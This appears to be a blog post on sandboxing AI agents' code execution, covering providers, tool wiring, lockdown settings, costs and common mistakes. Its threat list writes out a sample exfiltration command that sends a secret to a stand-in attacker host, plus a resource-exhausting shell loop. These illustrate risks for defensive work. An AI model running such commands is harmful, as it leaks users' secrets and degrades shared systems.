Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is a working guide to sandboxed code execution for agents in 2026.

Why sandboxes

Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:

  • Filesystem leakage: /etc/passwd, AWS credentials, other users’ data.
  • Network exfiltration: curl evil.com -d $secret.
  • Resource exhaustion: while true; do :; done.
  • Privilege escalation: kernel exploits, container breakouts.

A sandbox is the answer. The question is which one.

The 2026 stack

| Option | Type | Spin-up | Strengths |
|---|---|---|---|
| E2B | Managed Firecracker | <500ms | Built for AI agents, code-interpreter shape, GitHub auth |
| Modal | Managed serverless | 1–2s | General compute, GPU support, big batches |
| Daytona | Managed dev envs | 2–5s | IDE-shaped, good for dev tools |
| Fly Machines | Managed Firecracker | 200ms | Generic, very cheap |
| AWS Lambda | Managed | <100ms | Mature, restrictive (no GPU, 15min limit) |
| Cloudflare Workers / Sandbox | Managed isolates | 10ms | V8 only, very fast, limited |
| Daytona / Codespaces | Containers | 3–10s | Persistent dev experience |
| Self-host Firecracker | Self-host | 200ms | Full control |
| gVisor | Self-host | 100ms | Container-style sandbox |

E2B — the AI-native choice

E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.

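from e2b_code_interpreter import Sandbox

# Assumes E2B_API_KEY is set in the environment.
with Sandbox() as sb:
    # Assumes data.csv was already uploaded to the sandbox's working directory.
    result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
    print(result.text)  # text form of the last expression's value

    # Upload a file
    sb.files.write("/tmp/script.py", "print('hi')")

    # Run a shell command and show its output
    out = sb.commands.run("ls -la /tmp")
    print(out.stdout)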

What’s good:

  • Fast spin-up. Firecracker microVM under the hood.
  • Persistent state within a sandbox session.
  • File and command APIs — most agent needs.
  • Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
  • Internet access (allowlist configurable).

For a code interpreter for an LLM, E2B is the path of least resistance.

For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.

import modal

app = modal.App("agent-runner")

@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
    import pandas as pd
    from io import StringIO
    df = pd.read_csv(StringIO(csv_text))
    return df.describe().to_json()

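# Call from the agent; csv_data is the CSV text to analyze.
# Run this inside `with app.run():` or against a deployed app.
result = analyze.remote(csv_data)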

Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.

Tool integration with an LLM

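# Assumes `tool` is your agent framework's tool decorator and `E2BSandbox`
# is an async wrapper around the E2B client; neither is defined in this post.
@tool
async def run_python(code: str) -> str:
    """Run Python code in a sandbox. Returns the result text or the error."""
    async with E2BSandbox() as sb:
        try:
            result = await sb.run_code(code, timeout=30)
            # result.error may be an object rather than a string, so stringify it
            return str(result.text or result.error or "(no output)")
        except Exception as e:
            return f"sandbox error: {e}"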

Wire it to an agent:

agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})

The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.

What to lock down

For each sandbox session, decide:

  • Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
  • Filesystem: scratch only / mount specific dirs / read-only.
  • Time limit: 30 seconds is generous for most code; cap aggressively.
  • Memory limit: 1 GB for code interpreters; less for narrow tasks.
  • CPU limit: 1 core usually plenty.
  • Egress data: cap bytes; alert on outliers.

E2B and Modal expose controls for most of these; check each provider's documentation for the exact settings. Self-host and you set them yourself.
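
One way to keep these decisions in one place is a small policy object that the tool layer checks before it touches the sandbox. The sketch below is provider-agnostic and hypothetical: SandboxPolicy, its field names, and the 10 MB egress default are my assumptions, not any vendor's API. The defaults mirror the numbers in the list above.

```python
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class SandboxPolicy:
    """Hypothetical per-session policy; names and defaults are illustrative."""

    allowed_hosts: frozenset = frozenset()    # empty set means no network at all
    timeout_seconds: int = 30                 # hard cap per execution
    memory_mb: int = 1024                     # 1 GB for a code interpreter
    cpu_cores: int = 1
    max_egress_bytes: int = 10 * 1024 * 1024  # assumed default, tune per product

    def allows_url(self, url: str) -> bool:
        """Return True only if the URL's host is explicitly allowlisted."""
        host = (urlparse(url).hostname or "").lower()
        return host in self.allowed_hosts

    def allows_egress(self, bytes_sent_so_far: int, next_chunk: int) -> bool:
        """Return True if sending next_chunk keeps the session under its cap."""
        return bytes_sent_so_far + next_chunk <= self.max_egress_bytes


# Example: an agent that may only reach one (placeholder) API host.
policy = SandboxPolicy(allowed_hosts=frozenset({"api.example.com"}))
```

Matching on the parsed hostname rather than a substring matters: a URL like https://evil.com/?q=api.example.com contains the allowed name but resolves to a different host.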

When self-hosted wins

  • Strict compliance (data must not leave VPC).
  • High volume (>100 sandboxes/min sustained — managed cost rises).
  • Specific networking needs (custom egress filtering).
  • Custom base images that aren’t a fit for managed.

For most teams under that threshold, managed (E2B / Modal) wins.

Common patterns

1. Per-conversation sandbox

The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.
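
A minimal sketch of that lifecycle, assuming only that the sandbox client has a kill() method. SessionSandboxes and FakeSandbox are hypothetical names for illustration; in practice the factory would create a real sandbox.

```python
from typing import Callable, Dict, Protocol


class SandboxLike(Protocol):
    """Anything with a kill() method; stands in for a real sandbox client."""

    def kill(self) -> None: ...


class SessionSandboxes:
    """One sandbox per session ID, created lazily and killed at session end."""

    def __init__(self, create: Callable[[], SandboxLike]) -> None:
        self._create = create
        self._by_session: Dict[str, SandboxLike] = {}

    def get(self, session_id: str) -> SandboxLike:
        # Reuse the session's sandbox so state persists across tool calls.
        if session_id not in self._by_session:
            self._by_session[session_id] = self._create()
        return self._by_session[session_id]

    def end(self, session_id: str) -> None:
        # Kill and forget the sandbox; ending an unknown session is a no-op.
        sandbox = self._by_session.pop(session_id, None)
        if sandbox is not None:
            sandbox.kill()


class FakeSandbox:
    """Illustrative stand-in so the sketch runs without a provider account."""

    def __init__(self) -> None:
        self.killed = False

    def kill(self) -> None:
        self.killed = True


manager = SessionSandboxes(FakeSandbox)
```

Keying strictly by session ID also guards against sharing a sandbox between users: two sessions never receive the same instance, and a new session after end() always starts fresh.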

2. Per-call sandbox

Stateless: each run_python spins up fresh. Simple, slower, sometimes wasteful (re-imports pandas every call).

3. Pool of warm sandboxes

For low-latency apps, keep N sandboxes warm. New requests grab one from the pool. This adds some operational overhead, but requests get a sandbox in under 100ms.
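
A rough sketch of the pool, using only the standard library. WarmPool and the create factory are hypothetical; the factory stands in for whatever call creates a sandbox with your provider. Used sandboxes are deliberately never returned to the pool, so no state carries over between users.

```python
import queue
from typing import Callable, Generic, TypeVar

T = TypeVar("T")


class WarmPool(Generic[T]):
    """Keeps pre-created sandboxes ready; hands each one out exactly once."""

    def __init__(self, create: Callable[[], T], size: int) -> None:
        self._create = create
        self._ready: "queue.Queue[T]" = queue.Queue()
        for _ in range(size):
            self._ready.put(create())

    def acquire(self) -> T:
        """Take a warm sandbox if one is ready; otherwise create one cold."""
        try:
            return self._ready.get_nowait()
        except queue.Empty:
            return self._create()

    def refill(self) -> None:
        """Add one fresh sandbox; call this off the request path."""
        self._ready.put(self._create())

    def ready_count(self) -> int:
        return self._ready.qsize()
```

In a real service, refill() would run in a background worker after each acquire(), so the request only pays the cold-start cost when the pool is drained.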

4. Sandboxed agents (recursive)

The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).

Cost reality

E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.

Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.
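
The arithmetic above is easy to rerun with your own numbers. The sketch below uses the per-second prices quoted in this section; the $5,000/month ops figure in the usage note is a made-up placeholder, not a measured cost.

```python
def monthly_cost(price_per_second: float, seconds_per_query: float,
                 queries_per_day: int, days: int = 30) -> float:
    """Sandbox spend for a month at a steady daily query volume."""
    return price_per_second * seconds_per_query * queries_per_day * days


def break_even_queries_per_day(managed_price: float, self_host_price: float,
                               seconds_per_query: float,
                               monthly_ops_cost: float, days: int = 30) -> float:
    """Daily volume at which self-hosting savings cover the ops cost."""
    saving_per_query = (managed_price - self_host_price) * seconds_per_query
    return monthly_ops_cost / (saving_per_query * days)


# Prices from this section: 5-second queries, 100k queries/day.
managed = monthly_cost(0.0002, 5, 100_000)       # about $3,000/month
self_hosted = monthly_cost(0.00001, 5, 100_000)  # about $150/month
```

With a hypothetical $5,000/month of engineering and on-call time, break_even_queries_per_day(0.0002, 0.00001, 5, 5000) comes out to roughly 175k queries/day; below that volume, managed is the cheaper option under these assumptions.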

Common mistakes

1. No timeout

Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.
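
Besides the sandbox's own timeout, a client-side deadline keeps the agent from waiting forever if the sandbox call hangs. A minimal sketch with asyncio follows; run_with_deadline and fake_run are hypothetical names, and fake_run stands in for a real sandbox call.

```python
import asyncio
from typing import Awaitable, Callable


async def run_with_deadline(run: Callable[[str], Awaitable[str]],
                            code: str, seconds: float = 30.0) -> str:
    """Await run(code), but give up (and cancel it) after `seconds`."""
    try:
        return await asyncio.wait_for(run(code), timeout=seconds)
    except asyncio.TimeoutError:
        return f"timed out after {seconds:g}s"


async def fake_run(code: str) -> str:
    """Illustrative stand-in for a sandbox call that takes one second."""
    await asyncio.sleep(1)
    return "done"
```

This only stops the caller from waiting; it does not stop the sandbox from billing. Keep the server-side timeout set as well, and kill the sandbox when the deadline fires.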

2. Network wide-open

The agent emits a curl command and exfiltrates data. Always allowlist.

3. State across users

Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.

4. Logging code without redaction

The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.
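
A sketch of both options, filtering and hashing, using the standard library. The patterns are illustrative assumptions and far from exhaustive: they cover AWS access key IDs, keys with an sk- prefix, and assignments to names containing api_key, token, secret, or password. The function errs on the side of over-redaction.

```python
import hashlib
import re

_AWS_KEY_ID = re.compile(r"AKIA[0-9A-Z]{16}")
_SK_KEY = re.compile(r"sk-[A-Za-z0-9_-]{20,}")
# name = value / name: value, where the name looks like it holds a secret
_ASSIGNMENT = re.compile(
    r"(?i)(\w*(?:api_?key|token|secret|password)\w*\s*[=:]\s*)(['\"]?)([^'\"\s]+)(\2)"
)


def redact(code: str) -> str:
    """Replace likely secrets with a placeholder before the code is logged."""
    code = _AWS_KEY_ID.sub("[REDACTED]", code)
    code = _SK_KEY.sub("[REDACTED]", code)
    # Keep the variable name and quotes; drop only the value.
    return _ASSIGNMENT.sub(
        lambda m: f"{m.group(1)}{m.group(2)}[REDACTED]{m.group(4)}", code
    )


def fingerprint(code: str) -> str:
    """SHA-256 of the code, for correlating runs without storing the text."""
    return hashlib.sha256(code.encode("utf-8")).hexdigest()
```

For example, redact('OPENAI_API_KEY = "abc123"') returns 'OPENAI_API_KEY = "[REDACTED]"', while code with no matching pattern passes through unchanged.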

5. No resource caps

A misbehaving agent can OOM the sandbox host. Caps protect everyone.
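
If you self-host, the caps have to come from somewhere. As a rough illustration of the idea, the sketch below applies OS-level limits to a child process with Python's resource module. It assumes Linux, run_capped is a hypothetical helper, and rlimits on their own are not a sandbox: they cap memory and CPU but do nothing for filesystem or network isolation.

```python
import resource
import subprocess
import sys


def run_capped(code: str, mem_bytes: int = 1024**3,
               cpu_seconds: int = 5) -> subprocess.CompletedProcess:
    """Run code in a child Python process with memory and CPU limits."""

    def apply_limits() -> None:
        # Runs in the child just before exec: cap address space and CPU time.
        resource.setrlimit(resource.RLIMIT_AS, (mem_bytes, mem_bytes))
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))

    return subprocess.run(
        [sys.executable, "-c", code],
        preexec_fn=apply_limits,
        capture_output=True,
        text=True,
        timeout=cpu_seconds + 5,  # wall-clock backstop for sleeping processes
    )
```

With the 1 GB default, a child that tries to allocate 2 GB fails with a MemoryError inside its own process instead of pushing the host toward an OOM kill.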

What I’d build today

For a new agent product that runs code:

  • E2B for the sandbox (managed, fast, agent-shaped).
  • A run_python and run_shell tool wired to the agent.
  • Sandbox per user session, killed on disconnect.
  • 30-second timeout, 1 GB memory cap by default.
  • Network allowlist for the APIs the agent should reach.
  • Logging + alerting on long runs and failed sandboxes.

Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.

Read this next

If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev.

